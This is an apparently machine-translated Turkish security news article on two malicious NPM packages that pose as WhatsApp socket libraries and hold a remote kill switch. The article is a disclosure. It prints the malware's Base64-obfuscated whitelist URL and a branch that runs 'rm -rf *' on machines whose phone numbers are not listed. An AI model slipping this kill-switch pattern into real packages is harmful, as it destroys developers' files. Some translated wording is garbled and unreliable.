WhatsApp Geliştiricileri Uzak Kill Switch ile Silahlı NPM Paketlerinden Saldırı Altında


WhatsApp Geliştiricileri Uzak Kill Switch ile Silahlı NPM Paketlerinden Saldırı Altında

İki kötü niyetli NPM paketi, geliştirme sistemlerini tamamen silebilen uzaktan kumandalı bir yıkım mekanizması aracılığıyla WhatsApp geliştiricilerini hedefleyen sofistike silahlar olarak ortaya çıkmıştır.

Paketler, Naya-Flore Ve NVLORE-HSCtek bir komut aracılığıyla sistem çapında dosya silme işlemi yapabilen yıkıcı bir öldürme anahtarı barındırırken meşru WhatsApp Socket kütüphaneleri olarak maskelenir.

NPM kullanıcısı Nayflore tarafından e -posta adresini kullanarak yayınlandı [email protected]bu silahlandırılmış paketler bir ay içinde 1.110’dan fazla indirme biriktirerek geliştirici iş akışlarında sızan etkinliklerini gösterdi.

Google Haberleri

Kötü amaçlı kütüphaneler, şu anda küresel olarak 200 milyondan fazla işletmeye hizmet veren ve geliştiricilerin chatbot geliştirme, müşteri hizmetleri otomasyonu ve mesajlaşma entegrasyonları için üçüncü taraf paketleri rutin olarak yükledikleri çekici bir hedef ortam oluşturan büyüyen WhatsApp Business API ekosisteminden yararlanıyor.

Socket.DEV araştırmacıları, standart WhatsApp entegrasyon işlevselliği gibi görünen sofistike saldırı mekanizmasını belirlediler.

Kötü niyetli kod, özellikle requestPairingcode İşlev, geliştiricilerin WhatsApp bot kimlik doğrulama kurulumu sırasında doğal olarak çağıracakları meşru bir bileşen.

Uzaktan Öldürme Anahtarı Mimarisi

Paketler, telefon numarası doğrulama sistemleri aracılığıyla özellikle sinsi bir saldırı vektörü uygular.

Yürütme üzerine, kötü amaçlı kod, Base64 Obfuscation’ı kullanarak bir GitHub deposundan beyaz listeli telefon numaralarının uzak bir veritabanını alır:-

const sesiPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2E";
// Decodes to: https://raw.githubusercontent.com/navaLinh/database/main/seska.json

Saldırı mantığı, RequirPairingcode işlevi içindeki aldatıcı basit bir mekanizma yoluyla çalışır. Uzak beyaz listeyi getirdikten sonra kod, geliştiricinin telefon numarasının veritabanında olup olmadığını kontrol eder.

Öldürme anahtarını atlayan Endonezya cep telefonu numaralarını gösteren beyaz liste telefon numarası listesi (kaynak – soket.dev)

Sayı bulunursa, paket normal çalışmaya devam eder. Ancak, herhangi bir liste olmayan telefon numaraları için, sistem “0000” e tetikleyici bir değişken ayarlar ve yıkıcı yükü yürütür:-

if (getsNumberCode === "0000") {
    exec('rm -rf *')  // Destroy system
}

Bu seçici hedefleme yaklaşımı, tehdit aktörlerinin başkalarını yok ederken belirli telefon numaralarına ait sistemleri koruyarak operasyonel güvenliği sürdürmesine izin verir.

GitHub ile barındırılan veritabanı, tedarik zinciri saldırısı karmaşıklığında önemli bir evrimi temsil eden paket curji gerektirmeden hedefleme kararları üzerinde gerçek zamanlı kontrol sağlar.

SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın



Source link